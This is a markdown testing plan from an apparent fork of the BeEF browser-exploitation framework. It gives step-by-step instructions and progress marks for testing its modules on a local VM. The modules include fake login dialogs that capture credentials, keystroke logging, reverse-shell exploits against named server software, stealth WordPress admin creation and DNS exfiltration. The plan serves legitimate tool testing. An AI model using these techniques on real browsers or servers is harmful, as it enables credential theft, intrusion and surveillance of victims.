Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f03032dc141ea7487de63edc1bea528db0c6fa2c
beef/testing/manual_testing_plan.md
zinduolis 44b0c0aadc log progress on testing modules
2026-01-12 09:29:55 +10:00

291 lines
37 KiB
Markdown
Raw Blame History

# BeEF Manual Testing Plan (Local VM Edition)
This document provides a simplified approach for manually testing BeEF modules entirely within the same Linux Ubuntu VM where BeEF is running.
## 1. Environment Setup (Local VM)
### 1.1 BeEF Server
1. **Dependencies**: Already installed via `./install`.
2. **Configuration**: Credentials have been updated in `config.yaml`.
3. **Launch**: Run `./beef` from the repository root.
4. **Access**: Open the local browser (e.g., Firefox) and navigate to the BeEF UI: `http://127.0.0.1:3000/ui/panel`.
### 1.2 Hooked Browsers (Local)
For local testing on the same machine:
1. Open a new tab or window in your browser (Firefox, Chromium, etc.).
2. Navigate to the hook demo page: `http://127.0.0.1:3000/demos/butcher/index.html`.
3. The browser will appear in the BeEF "Online Browsers" list as `127.0.0.1`.
## 2. Testing Strategy: Grouped Execution
1. **Phase 1: Common Infrastructure (Firefox)**: Start here. These modules work on the standard Linux/Firefox setup provided by the VM and don't require external devices or specific insecure software.
2. **Phase 2: Specific Requirements (Firefox)**: Test these if you have the specific requirements (e.g., Android device, Flash plugin, specific vulnerable server running).
3. **Phase 3: Other Browsers**: Use Chrome/Edge/Safari for modules that explicitly don't work in Firefox.
## 3. Module Inventory and Instructions
### 3.1 Phase 1: Common Infrastructure (Standard Firefox)
Test these modules using **Firefox** on your local Linux VM. They leverage standard browser features or the BeEF infrastructure itself.
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [x] | **Alert Dialog** | 1. Set `Title`, `Message`, and `Button name`.<br>2. Execute module.<br>3. Verify alert dialog appears on hooked page with configured text. | None. | |
| [x] | **BlockUI Modal Dialog** | 1. Set `Message` and `Timeout (s)`.<br>2. Execute module.<br>3. Verify blocking overlay appears with message.<br>4. Wait for timeout or use UnBlockUI to remove. | None. | |
| [x] | **Clickjacking** | 1. Set `iFrame Src` to target page for clickjacking.<br>2. Execute module.<br>3. Verify page shows overlay for click-based attack.<br>4. Click as user would to test interaction capture. | None. | |
| [x] | **Confirm Close Tab** | 1. Configure: `Confirm text`, `Create a pop-under window on user\`<br>2. Click Execute.<br><br>_Shows a confirm dialog to the user when they try to close a tab._ | Close tab/window. Check for residual pop-unders. | a window pops up, but the text not as per command |
| [x] | **Create Foreground iFrame** | 1. Execute module.<br>2. Click "Our Meaty Friends" button to reveal links.<br>3. Click any link (e.g., "The Browser Exploitation Framework Project homepage").<br>4. Verify page loads in fullscreen iFrame overlay (check DevTools for `<iframe>` with `z-index:1` and 100% width/height).<br>5. Confirm hook remains active in BeEF UI. | Close tab/window. | |
| [x] | **Create Invisible Iframe** | 1. Set `URL` to any valid URL (e.g., `http://example.com`).<br>2. Execute module.<br>3. Open DevTools → Elements → search for `<iframe>` with `visibility:hidden` or `display:none`.<br>4. Verify iframe exists with correct src. | None. | |
| [x] | **Create Pop Under** | 1. Set `Clickjack` to `on` (waits for click) or `off` (immediate).<br>2. Execute module.<br>3. If Clickjack=on, click anywhere on page.<br>4. Check for small hidden window in taskbar (or DevTools: new window to `/demos/plain.html`).<br>5. Verify BeEF shows 2nd hooked browser. | Close pop-under window. | |
| [-] | **Cross-Origin Scanner (CORS)** | 1. Set `Scan IP range` (e.g., `127.0.0.1-127.0.0.1`) and `Ports` (e.g., `80,443,8080`).<br>2. Execute module.<br>3. Check command results for list of discovered web servers allowing CORS. | None. | See [CORS-001](testing_errors.md#cors-001-cross-origin-scanner-cors-module-error) |
| [x] | **DNS Enumeration** | 1. Configure: `DNS (comma separated)`, `Timeout (ms)`<br>2. Click Execute.<br><br>_Discover DNS hostnames within the victim's network using dictionary and timing attacks._ | None. | |
| [x] | **DOSer** | 1. Set `URL` to `http://127.0.0.1:3000/demos/plain.html`.<br>2. Set `Delay between requests (ms)` to `100`.<br>3. Set `HTTP Method` to `GET`.<br>4. Execute module.<br>5. Wait for status report in results (appears every 10s: "Requests sent: X").<br>6. Verify ongoing requests in browser DevTools → Network tab. | Refresh hooked page to stop worker. | |
| [-] | **Detect Extensions** | 1. Execute module.<br>2. Check command results for list of detected Chrome/Firefox extensions. | None. | See [EXT-001](testing_errors.md#ext-001-detect-extensions-module-failure) |
| [x] | **Detect MIME Types** | 1. Click Execute.<br><br>_This module retrieves the browser's supported MIME types._ | None. | |
| [x] | **Detect Popup Blocker** | 1. Execute module.<br>2. Check command result: "Popup blocker enabled" or "Popup blocker not detected". | None. | |
| [x] | **Fetch Port Scanner** | 1. Set `Scan IP or Hostname` (e.g., `127.0.0.1`) and `Specific port(s)` (e.g., `22,80,443,3000`).<br>2. Execute module.<br>3. Check command results for open/closed port status. | None. | |
| [-] | **Fingerprint Browser (PoC)** | 1. Execute module.<br>2. Check command results for browser name, version, and platform. | None. | See [FP-001](testing_errors.md#fp-001-fingerprint-browser-poc-module-failure) |
| [x] | **Fingerprint Browser** | 1. Execute module.<br>2. Check command results for detailed fingerprint (canvas, WebGL, fonts, plugins, etc.). | None. | |
| [-] | **Fingerprint Local Network** | 1. Run `hostname -I` to find your IP (e.g., `192.168.1.5`).<br>2. Set `Scan IP range` to `common` (or specific IP).<br>3. Open Browser DevTools -> Network tab.<br>4. Execute module.<br>5. **Verify**: You will see many requests in DevTools (red/failed is normal).<br>6. **Duration**: `common` scan takes ~10-30s. Full /24 scan takes minutes.<br>7. Check BeEF results for any detected devices. | Refresh page to stop early. | See [NET-001](testing_errors.md#net-001-fingerprint-local-network-no-feedback) |
| [-] | **Fingerprint Routers** | 1. Click Execute.<br><br>_This module attempts to discover network routers on the local network._ | None. | See [NET-002](testing_errors.md#net-002-fingerprint-routers-module-error) |
| [x] | **Get Geolocation (API)** | 1. Execute module.<br>2. Allow/deny location permission in browser popup.<br>3. If allowed, check results for latitude/longitude coordinates. | None. | |
| [ ] | **Get HTTP Servers (Favicon)** | 1. Configure: `Remote IP(s)`, `Ports`, `Workers`...<br>2. Click Execute.<br><br>_Attempts to discover HTTP servers on the specified IP range by checking for a favicon._ | None. | |
| [ ] | **Get Internal IP WebRTC** | 1. Execute module.<br>2. Check command results for local/private IP address (e.g., `192.168.x.x`). | None. | |
| [ ] | **Get Protocol Handlers** | 1. Configure: `Link Protocol(s)`, `Link Address`<br>2. Click Execute.<br><br>_This module attempts to identify protocol handlers present on the hooked browser._ | None. | |
| [ ] | **Get Visited Domains** | 1. Configure: `Specify custom page to check`<br>2. Click Execute.<br><br>_This module will retrieve rapid history extraction through non-destructive cache timing._ | None. | |
| [ ] | **Hijack Opener Window** | 1. First open demo page via a link from another page (so `window.opener` exists).<br>2. Execute module on the opened tab.<br>3. Check if opener window's location changed to BeEF `/iframe#` URL.<br>4. Verify result in command output. | Close affected windows. | |
| [ ] | **Identify LAN Subnets** | 1. Configure: `Timeout for each request (ms)`<br>2. Click Execute.<br><br>_Discover active hosts in the internal network(s) of the hooked browser._ | None. | |
| [ ] | **Lcamtuf Download** | 1. Configure: `Real File Path`, `Malicious File Path`, `Run Once`<br>2. Click Execute.<br><br>_This module will attempt to execute a lcamtuf download._ | Delete downloaded files. | |
| [ ] | **Link Rewrite** | 1. Execute module.<br>2. Click "Our Meaty Friends" button to reveal links.<br>3. Hover over any link and check DevTools or status bar.<br>4. Verify all `href` attributes have been modified. | Refresh page to restore links. | |
| [ ] | **Man-In-The-Browser** | 1. Execute module.<br>2. Click any link on page to navigate.<br>3. Verify page loads via AJAX (URL bar may not change, or content loads dynamically).<br>4. Confirm BeEF hook remains active.<br>5. Check command result shows "Browser hooked". | Close tab. | |
| [ ] | **No Sleep** | 1. Click Execute.<br><br>_This module uses NoSleep.js to prevent display sleep and enable wake lock in any Android or iOS web browser._ | None. | |
| [ ] | **Ping Sweep (FF)** | 1. Configure: `Scan IP range (C class or IP)`, `Timeout (ms)`, `Delay between requests (ms)`<br>2. Click Execute.<br><br>_Discover active hosts in the internal network of the hooked browser._ | None. | |
| [ ] | **Ping Sweep (JS XHR)** | 1. Configure: `Scan IP range (C class)`, `Workers`<br>2. Click Execute.<br><br>_Discover active hosts in the internal network of the hooked browser using JavaScript XHR._ | None. | |
| [ ] | **Play Sound** | 1. Set `Sound File Path` to a valid audio URL (e.g., `/demos/alert.mp3` or external URL).<br>2. Execute module.<br>3. Listen for audio playback on hooked browser. | None. | |
| [ ] | **Port Scanner (Multiple Methods)** | 1. Set `Scan IP or Hostname` (e.g., `127.0.0.1`) and `Specific port(s)` (e.g., `22,80,443,3000`).<br>2. Execute module.<br>3. Check results for open ports (tries WebSockets, CORS, img tags). | None. | |
| [ ] | **Pretty Theft** | 1. Set `Dialog Type` (e.g., `Facebook`, `LinkedIn`, `Windows`, `Generic`).<br>2. Set `Backing` (e.g., `Grey`, `Clear`).<br>3. Execute module.<br>4. Verify fake login dialog appears on hooked page.<br>5. Enter test credentials and submit.<br>6. Check BeEF command results for captured credentials. | None. | |
| [ ] | **Raw JavaScript** | 1. Set `Javascript Code` (e.g., `alert('test')` or `console.log(document.cookie)`).<br>2. Execute module.<br>3. Verify JS executed (alert shown, or check DevTools console). | None. | |
| [ ] | **Redirect Browser (Rickroll)** | 1. Execute module.<br>2. Verify page is replaced with fullscreen Rickroll video.<br>3. Confirm hook remains active in BeEF UI. | Refresh page to restore. | |
| [ ] | **Redirect Browser (Standard)** | 1. Set `Redirect URL` (e.g., `https://example.com`).<br>2. Execute module.<br>3. Verify browser navigates to specified URL (hook will be lost). | Re-hook if needed. | |
| [ ] | **Redirect Browser (iFrame)** | 1. Set `Redirect URL`, optional `Title` and `Favicon`.<br>2. Execute module.<br>3. Verify page shows iFrame overlay with target URL.<br>4. Confirm hook remains active. | Close tab. | |
| [ ] | **Replace Videos (Fake Plugin)** | 1. Configure: `Payload URL`, `jQuery Selector`<br>2. Click Execute.<br><br>_Replaces an object selected with jQuery with an image advising the user to install a missing plugin._ | None. | |
| [ ] | **Resource Exhaustion DoS** | 1. Execute module.<br>2. Observe browser becoming slow/unresponsive.<br>3. May need to force-close browser tab/window. | Force-close tab if needed. | |
| [ ] | **Return Ascii Chars** | 1. Execute module.<br>2. Check command results for ASCII character set. | None. | |
| [ ] | **Return Image** | 1. Execute module.<br>2. Check command results for base64-encoded PNG image data. | None. | |
| [ ] | **Simple Hijacker** | 1. Configure: `Targetted domains`, `Template to use`<br>2. Click Execute.<br><br>_Hijack clicks on links to display what you want._ | None. | |
| [ ] | **Spoof Address Bar (data URL)** | 1. Configure: `Spoofed URL`, `Real URL`<br>2. Click Execute.<br><br>_This module redirects the browser to a legitimate looking URL with a data scheme._ | None. | |
| [ ] | **Spyder Eye** | 1. Set `Repeat` (number of screenshots) and `Delay` (ms between shots).<br>2. Execute module.<br>3. Check command results for base64-encoded screenshot(s) of the victim's viewport. | None. | |
| [ ] | **TabNabbing** | 1. Set `URL` (e.g. fake login page) and `Wait` time (e.g., 1 minute).<br>2. Execute module.<br>3. Switch to a different tab and wait the configured time.<br>4. Switch back and verify the hooked tab has navigated to specified URL. | Close tab. | |
| [ ] | **Test CORS Request** | 1. Configure: `Method`, `URL`, `Data`<br>2. Click Execute.<br><br>_Test the beef.net.cors.request function._ | None. | |
| [ ] | **Test HTTP Redirect** | 1. Click Execute.<br><br>_Test the HTTP 'redirect' handler._ | None. | |
| [ ] | **Test JS variable passing** | 1. Configure: `Payload Name`<br>2. Click Execute.<br><br>_Test for JS variable passing._ | None. | |
| [ ] | **Test Network Request** | 1. Configure: `Scheme`, `Method`, `Domain`...<br>2. Click Execute.<br><br>_Test the beef.net.request function by retrieving a URL._ | None. | |
| [ ] | **Test Returning Results** | 1. Configure: `Times to repeat`, `String to repeat`<br>2. Click Execute.<br><br>_This module will return a string of the specified length._ | None. | |
| [ ] | **Test beef.debug()** | 1. Configure: `Debug Message`<br>2. Click Execute.<br><br>_Test the 'beef.debug()' function._ | None. | |
| [ ] | **Text to Voice** | 1. Set `Text` (e.g., "Hello world") and `Language` (e.g., `en`).<br>2. Execute module.<br>3. Listen for audio playback of the text. | None. | |
| [ ] | **UnBlockUI** | 1. First execute "BlockUI Modal Dialog" module to create a blocking overlay.<br>2. Then execute this "UnBlockUI" module.<br>3. Verify the BlockUI overlay is removed. | None. | |
| [ ] | **Unhook** | 1. Execute module.<br>2. Verify hook JavaScript is removed from page (check DevTools console).<br>3. Confirm browser goes "Offline" in BeEF UI.<br>4. Confirm no further commands can be executed. | Re-hook page if needed. | |
| [ ] | **iFrame Event Key Logger** | 1. Set `iFrame Src` (target URL to load in overlay).<br>2. Set `Send Back Interval` (e.g., 5000ms).<br>3. Execute module.<br>4. Type in the iFrame overlay.<br>5. Check BeEF command results for captured keystrokes. | Close tab. | |
### 3.2 Phase 2: Specific Requirements (Firefox)
These modules require specific devices, plugins, vulnerable software, or valid credentials to work.
#### 3.2.1 Mobile & PhoneGap
Requires an Android/iOS device or PhoneGap environment.
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Alert User** | 1. Click Execute.<br><br>_Show user an alert. This module requires the PhoneGap API._ | None. | |
| [ ] | **Beep** | 1. Click Execute.<br><br>_Make the phone beep. This module requires the PhoneGap API._ | None. | |
| [ ] | **Check Connection** | 1. Click Execute.<br><br>_Find out the network connection type e.g. Wifi, 3G. This module requires the PhoneGap API._ | None. | |
| [ ] | **Detect PhoneGap** | 1. Click Execute.<br><br>_Detects if the PhoneGap API is present._ | None. | |
| [ ] | **Geolocation** | 1. Click Execute.<br><br>_Geo locate your victim. This module requires the PhoneGap API._ | None. | |
| [ ] | **Get Network Connection Type** | 1. Click Execute.<br><br>_Retrieve the network connection type (wifi, 3G, etc). Note: Android only._ | None. | |
| [ ] | **Globalization Status** | 1. Click Execute.<br><br>_Examine device local settings. This module requires the PhoneGap API._ | None. | |
| [ ] | **Keychain** | 1. Configure: `Service name`, `Key`, `Value`...<br>2. Click Execute.<br><br>_Read/CreateUpdate/Delete Keychain Elements. This module requires the PhoneGap API._ | None. | |
| [ ] | **List Contacts** | 1. Click Execute.<br><br>_Examine device contacts. This module requires the PhoneGap API._ | None. | |
| [ ] | **List Files** | 1. Configure: `Directory`<br>2. Click Execute.<br><br>_Examine device file system. This module requires the PhoneGap API._ | None. | |
| [ ] | **List Plugins** | 1. Click Execute.<br><br>_Attempts to guess installed plugins. This module requires the PhoneGap API._ | None. | |
| [ ] | **Persist resume** | 1. Click Execute.<br><br>_Persist over applications sleep/wake events. This module requires the PhoneGap API._ | None. | |
| [ ] | **Persistence (PhoneGap)** | 1. Configure: `Hook URL`<br>2. Click Execute.<br><br>_Insert the BeEF hook into PhoneGap's index.html (iPhone only). This module requires the PhoneGap API._ | None. | |
| [ ] | **Prompt User** | 1. Configure: `Title`, `Question`, `Yes`...<br>2. Click Execute.<br><br>_Ask device user a question. This module requires the PhoneGap API._ | None. | |
| [ ] | **Start Recording Audio** | 1. Configure: `File Name`<br>2. Click Execute.<br><br>_Start recording audio. This module requires the PhoneGap API._ | None. | |
| [ ] | **Stop Recording Audio** | 1. Click Execute.<br><br>_Stop recording audio. This module requires the PhoneGap API._ | None. | |
| [ ] | **Track Physical Movement** | 1. Click Execute.<br><br>_This module will track the physical movement of the user's device._ | None. | |
| [ ] | **Upload File** | 1. Configure: `Destination`, `File Path`<br>2. Click Execute.<br><br>_Upload files from device to a server of your choice. This module requires the PhoneGap API._ | None. | |
#### 3.2.2 Legacy Plugins (Flash, Java, Silverlight, etc.)
Requires the specific plugin to be installed and enabled in the browser.
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Cross-Origin Scanner (Flash)** | 1. Configure: `Scan IP range (C class)`, `Ports`, `Workers`...<br>2. Click Execute.<br><br>_Scans an IP range... This module uses ContentHijacking.swf._ | None. | |
| [ ] | **Detect Foxit Reader** | 1. Click Execute.<br><br>_This module will check if the browser has Foxit Reader Plugin._ | None. | |
| [ ] | **Detect QuickTime** | 1. Click Execute.<br><br>_This module will check if the browser has Quicktime support._ | None. | |
| [ ] | **Detect RealPlayer** | 1. Click Execute.<br><br>_This module will check if the browser has RealPlayer support._ | None. | |
| [ ] | **Detect Silverlight** | 1. Click Execute.<br><br>_This module will check if the browser has Silverlight support._ | None. | |
| [ ] | **Detect Unity Web Player** | 1. Click Execute.<br><br>_Detects Unity Web Player._ | None. | |
| [ ] | **Detect VLC** | 1. Click Execute.<br><br>_This module will check if the browser has VLC plugin._ | None. | |
| [ ] | **Detect Windows Media Player** | 1. Click Execute.<br><br>_This module will check if the browser has the Windows Media Player plugin installed._ | None. | |
| [ ] | **Get Internal IP (Java)** | 1. Configure: `Number`<br>2. Click Execute.<br><br>_Retrieve the local network interface IP address of the victim machine using an unsigned Java applet._ | None. | |
| [ ] | **Get System Info (Java)** | 1. Click Execute.<br><br>_This module will retrieve basic information about the host system using an unsigned Java Applet._ | None. | |
| [ ] | **Webcam (Flash)** | 1. Configure: `Social Engineering Title`...<br>2. Click Execute.<br><br>_Shows the Adobe Flash 'Allow Webcam' dialog._ | None. | |
| [ ] | **Webcam Permission Check** | 1. Click Execute.<br><br>_Checks if user has allowed BeEF domain to access Camera/Mic with Flash._ | None. | |
#### 3.2.3 Specific Target Software / Services
Requires a specific vulnerable software or service to be running and accessible (e.g., Apache, JBoss, Printers).
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Apache Cookie Disclosure** | 1. Click Execute.<br><br>_Exploits CVE-2012-0053. Requires Apache HTTP Server 2.2.0 through 2.2.21._ | Clear browser cookies. | |
| [ ] | **Apache Felix Remote Shell** | 1. Configure: `Target Host`, `Target Port`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell on an Apache Felix Remote Shell server._ | None. | |
| [ ] | **Bindshell (POSIX)** | 1. Configure: `Target Address`, `Target Port`, `Timeout (s)`...<br>2. Click Execute.<br><br>_Sends commands to a listening POSIX shell._ | None. | |
| [ ] | **Bindshell (Windows)** | 1. Configure: `Target Address`, `Target Port`, `Timeout (s)`...<br>2. Click Execute.<br><br>_Sends commands to a listening Windows shell._ | None. | |
| [ ] | **ColdFusion Directory Traversal** | 1. Configure: `Retrieve file`, `CF server OS`...<br>2. Click Execute.<br><br>_Exploits directory traversal in ColdFusion 8/9._ | None. | |
| [ ] | **Cross-Site Faxing (XSF)** | 1. Configure: `Target Address`, `Target Port`...<br>2. Click Execute.<br><br>_Sends commands to ActiveFax RAW server socket._ | None. | |
| [ ] | **Cross-Site Printing (XSP)** | 1. Configure: `Target Address`, `Target Port`...<br>2. Click Execute.<br><br>_Sends a message to a listening print port (9100)._ | None. | |
| [ ] | **Detect Airdroid** | 1. Configure: `IP or Hostname`, `Port`<br>2. Click Execute.<br><br>_Attempts to detect Airdroid application for Android running on localhost._ | None. | |
| [ ] | **Detect Burp** | 1. Run Burp Suite with browser proxied through it.<br>2. Execute module.<br>3. Check if Burp is detected (result shows "Burp detected" or similar). | None. | |
| [ ] | **Detect CUPS** | 1. Configure: `IP or Hostname`, `Port`<br>2. Click Execute.<br><br>_Attempts to detect Common UNIX Printing System (CUPS) on localhost._ | None. | |
| [ ] | **Detect Coupon Printer** | 1. Click Execute.<br><br>_Attempts to detect Coupon Printer on localhost._ | None. | |
| [ ] | **Detect Ethereum ENS** | 1. Configure: `Image resource`...<br>2. Click Execute.<br><br>_Detects if using Ethereum ENS resolvers._ | None. | |
| [ ] | **Detect Google Desktop** | 1. Click Execute.<br><br>_Attempts to detect Google Desktop running on the default port 4664._ | None. | |
| [ ] | **Detect OpenNIC DNS** | 1. Configure: `Image resource`...<br>2. Click Execute.<br><br>_Detects if using OpenNIC DNS resolvers._ | None. | |
| [ ] | **EXTRAnet Collaboration Tool** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Exploits command execution in 'admserver' component._ | None. | |
| [ ] | **Farsite X25 gateway** | 1. Configure: `HTTP(s)`, `Remote Host`...<br>2. Click Execute.<br><br>_Exploits CVE-2014-7175/7173 to execute code._ | None. | |
| [ ] | **Firephp 0.7.1 RCE** | 1. Click Execute.<br><br>_Exploit FirePHP <= 0.7.1._ | None. | |
| [ ] | **Get Wireless Keys** | 1. Click Execute.<br><br>_Retrieve wireless profiles (Windows Vista and Windows 7 only)._ | None. | |
| [ ] | **Get ntop Network Hosts** | 1. Configure: `Remote Host`, `Remote Port`<br>2. Click Execute.<br><br>_Retrieves information from ntop (unauthenticated)._ | None. | |
| [ ] | **GlassFish WAR Upload** | 1. Configure: `Host`, `Filename`...<br>2. Click Execute.<br><br>_Attempts to deploy a malicious war file on GlassFish Server 3.1.1._ | None. | |
| [ ] | **GroovyShell Server** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Uses GroovyShell Server interface to execute commands._ | None. | |
| [ ] | **Hook Default Browser** | 1. Configure: `URL`<br>2. Click Execute.<br><br>_This module will use a PDF to attempt to hook the default browser._ | None. | |
| [ ] | **HP uCMDB 9.0x add user** | 1. Configure: `Protocol`, `Host`, `Port`...<br>2. Click Execute.<br><br>_Attempts to add users to HP uCMDB._ | None. | |
| [ ] | **IBM iNotes (Extract List)** | 1. Click Execute.<br><br>_Extracts iNotes contact list._ | None. | |
| [ ] | **IBM iNotes (Flooder)** | 1. Configure: `To`, `Subject`, `Body`, `Count`...<br>2. Click Execute.<br><br>_Floods an email address from the victim's account._ | None. | |
| [ ] | **IBM iNotes (Read)** | 1. Click Execute.<br><br>_Read a note from the victim's IBM iNotes._ | None. | |
| [ ] | **IBM iNotes (Send)** | 1. Configure: `To`, `Subject`, `Body`<br>2. Click Execute.<br><br>_Sends an email from the victim's account._ | None. | |
| [ ] | **IBM iNotes (Send w/ Attachment)** | 1. Configure: `To`, `Subject`, `Body`, `File`...<br>2. Click Execute.<br><br>_Sends an email with attachment from the victim's account._ | None. | |
| [ ] | **IMAP** | 1. Configure: `IMAP Server`, `Port`, `Commands`<br>2. Click Execute.<br><br>_Sends commands to an IMAP4 server._ | None. | |
| [ ] | **IRC** | 1. Configure: `IRC Server`, `Port`, `Username`...<br>2. Click Execute.<br><br>_Connects to an IRC server and sends messages._ | None. | |
| [ ] | **IRC NAT Pinning** | 1. Configure: `Connect to`, `Private IP`, `Private Port`<br>2. Click Execute.<br><br>_Attempts to open closed ports on statefull firewalls compatible with IRC tracking._ | None. | |
| [ ] | **Jboss 6.0.0M1 JMX Deploy** | 1. Configure: `Remote Target Host`...<br>2. Click Execute.<br><br>_Deploy a JSP reverse or bind shell using JMX._ | None. | |
| [ ] | **Jenkins Code Exec CSRF** | 1. Configure: `Remote Host`, `Target URI`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell from Jenkins Groovy Script console._ | None. | |
| [ ] | **Kemp LoadBalancer RCE** | 1. Configure: `URL`, `Remote Port`...<br>2. Click Execute.<br><br>_Exploits RCE in Kemp LoadBalancer 7.1-16._ | None. | |
| [ ] | **QEMU Monitor 'migrate'** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell from QEMU monitor service._ | None. | |
| [ ] | **QNX QCONN Command Exec** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Exploits vulnerability in qconn component of QNX Neutrino._ | None. | |
| [ ] | **RFI Scanner** | 1. Configure: `Target Protocol`, `Target Host`...<br>2. Click Execute.<br><br>_Scans web server for RFI vulnerabilities._ | None. | |
| [ ] | **Redis** | 1. Configure: `Target Address`, `Target Port`...<br>2. Click Execute.<br><br>_Sends commands to a listening Redis daemon._ | None. | |
| [ ] | **Shell Shock (CVE-2014-6271)** | 1. Configure: `Target`, `HTTP Method`...<br>2. Click Execute.<br><br>_Attemp to use vulnerability CVE-2014-627 to execute arbitrary code._ | None. | |
| [ ] | **Shell Shock Scanner** | 1. Configure: `HTTP Method`, `Target Protocol`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell by requesting ~400 potentially vulnerable CGI scripts._ | None. | |
| [ ] | **VTiger CRM Upload Exploit** | 1. Configure: `Target Web Server`...<br>2. Click Execute.<br><br>_Uploads and executes a reverse shell on VTiger CRM 5.0.4._ | None. | |
| [ ] | **WAN Emulator Command Exec** | 1. Configure: `Target Host`, `Target Port`...<br>2. Click Execute.<br><br>_Attempts to get a reverse root shell on a WAN Emulator server._ | None. | |
| [ ] | **WordPress Add User** | 1. Configure: `Username`, `Pwd`, `Email`...<br>2. Click Execute.<br><br>_Adds a WordPress User._ | None. | |
| [ ] | **WordPress Add Administrator** | 1. Configure: `Username:`, `Pwd:`...<br>2. Click Execute.<br><br>_Stealthily adds a Wordpress administrator account._ | Close tab/window. Check for residual pop-unders. | |
| [ ] | **WordPress Current User** | 1. Click Execute.<br><br>_Get the current logged in user information._ | None. | |
| [ ] | **WordPress Upload RCE (Plugin)** | 1. Configure: `Auth Key`<br>2. Click Execute.<br><br>_Attempts to upload and activate a malicious wordpress plugin._ | None. | |
| [ ] | **Wordpress Post-Auth RCE** | 1. Configure: `Target Web Server`<br>2. Click Execute.<br><br>_Attempts to upload and activate a malicious wordpress plugin._ | None. | |
| [ ] | **Zenoss 3.x Add User** | 1. Configure: `Zenoss web root`...<br>2. Click Execute.<br><br>_Attempts to add a user to a Zenoss Core 3.x server._ | None. | |
| [ ] | **Zenoss 3.x Command Exec** | 1. Configure: `Target Host`, `Target Port`...<br>2. Click Execute.<br><br>_Attempts to get a reverse shell on a Zenoss 3.x server._ | None. | |
| [ ] | **ruby-nntpd Command Exec** | 1. Configure: `Remote Host`, `Remote Port`...<br>2. Click Execute.<br><br>_Uses 'eval' verb in ruby-nntpd 0.01dev to execute commands._ | None. | |
#### 3.2.4 Social Engineering / Account Phishing
Requires the user to be logged into valid accounts (Gmail, Facebook, etc.) or susceptible to specific social engineering tricks.
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Clippy** | 1. Configure: `Clippy image directory`...<br>2. Click Execute.<br><br>_Brings up a clippy image and asks the user to do stuff._ | None. | |
| [ ] | **Detect Social Networks** | 1. Configure: `Detection Timeout`<br>2. Click Execute.<br><br>_Detects if authenticated to GMail, Facebook and Twitter._ | None. | |
| [ ] | **Fake Flash Update** | 1. Configure: `Image`, `Payload URI`<br>2. Click Execute.<br><br>_Prompts the user to install an update to Adobe Flash Player._ | None. | |
| [ ] | **Fake Notification Bar** | 1. Configure: `Notification text`<br>2. Click Execute.<br><br>_Displays a fake notification bar._ | None. | |
| [ ] | **Fake Notification Bar (Chrome)**| 1. Configure: `URL`, `Notification text`<br>2. Click Execute.<br><br>_Displays a fake Chrome notification bar._ | None. | |
| [ ] | **Fake Notification Bar (Firefox)**| 1. Configure: `Plugin URL`, `Notification text`<br>2. Click Execute.<br><br>_Displays a fake Firefox notification bar._ | None. | |
| [ ] | **Fake Notification Bar (IE)** | 1. Configure: `URL`, `Notification text`<br>2. Click Execute.<br><br>_Displays a fake IE notification bar._ | None. | |
| [x] | **Google Phishing** | 1. Configure: `XSS hook URI`, `Gmail logout interval`...<br>2. Click Execute.<br><br>_XSRF logout of Gmail, show phishing page._ | None. | |
| [ ] | **Read Gmail** | 1. Click Execute.<br><br>_Grabs unread message ids from gmail atom feed._ | None. | |
| [ ] | **Send Gvoice SMS** | 1. Configure: `To`, `Message`<br>2. Click Execute.<br><br>_Send a text message (SMS) through Google Voice._ | None. | |
| [ ] | **Skype iPhone XSS** | 1. Click Execute.<br><br>_Steals iPhone contacts using a Skype XSS vuln._ | None. | |
#### 3.2.5 Advanced Network & Infrastructure
Requires specific network configurations (e.g., DNS, Tor, Proxy, WPAD).
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **DNS Tunnel** | 1. Configure: `Domain`, `Data to send`<br>2. Click Execute.<br><br>_This module sends data one way over DNS, client to server only._ | None. | |
| [ ] | **DNS Tunnel** | 1. Configure: `Domain`, `Message`, `Wait between requests (ms)`<br>2. Click Execute.<br><br>_This module sends data one way over DNS. Message split into chunks._ | None. | |
| [ ] | **DNS Tunnel: Server-to-Client** | 1. Configure: `Payload Name`, `Zone`, `Message`<br>2. Click Execute.<br><br>_This module retrieves data sent by the server over DNS covert channel._ | None. | |
| [ ] | **Detect Tor** | 1. Configure: `What Tor resource to request`, `Detection timeout`<br>2. Click Execute.<br><br>_This module will detect if the zombie is currently using Tor._ | None. | |
| [ ] | **Get Proxy Servers (WPAD)** | 1. Click Execute.<br><br>_This module retrieves proxy server addresses for the zombie browser's local network using WPAD._ | None. | |
#### 3.2.6 Antivirus (Requires Specific AV/Extension)
The "Detect Antivirus" module looks for artifacts (injected scripts, user-agent changes, or specific DOM elements) created by commercial antivirus products or their browser extensions.
**Setup Steps (Local VM):**
1. **Install Browser Extension**: BeEF detects specfic artifacts in the DOM or User-Agent string. A free option to test is the **Avast Online Security** extension.
- Open Firefox in the VM.
- Navigate to the [Avast Online Security & Privacy](https://addons.mozilla.org/en-US/firefox/addon/avast-online-security/) addon page.
- Click **Add to Firefox**.
2. **Execute**: Run the module.
- *Note: valid detection depends on the extension injecting specific signatures (e.g. `ASW/` in User-Agent) which may vary by version.*
| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Detect Antivirus** | 1. Install Avast extension (see above).<br>2. Execute module.<br>3. Check results for "Avast" or other detected AV. | Uninstall extension. | |
#### 3.2.7 Browser Extensions (Requires Installation)
